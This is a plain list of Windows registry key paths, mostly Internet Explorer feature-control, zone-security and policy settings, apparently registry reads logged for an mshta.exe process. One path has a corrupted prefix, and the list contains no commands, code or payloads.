HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
\x1a60\xa7EY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BYPASS_CACHE_FOR_CREDPOLICY_KB936611
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_MAPPINGS_FOR_CREDPOLICY
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISALLOW_NULL_IN_RESPONSE_HEADERS
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DIGEST_NO_EXTRAS_IN_URI
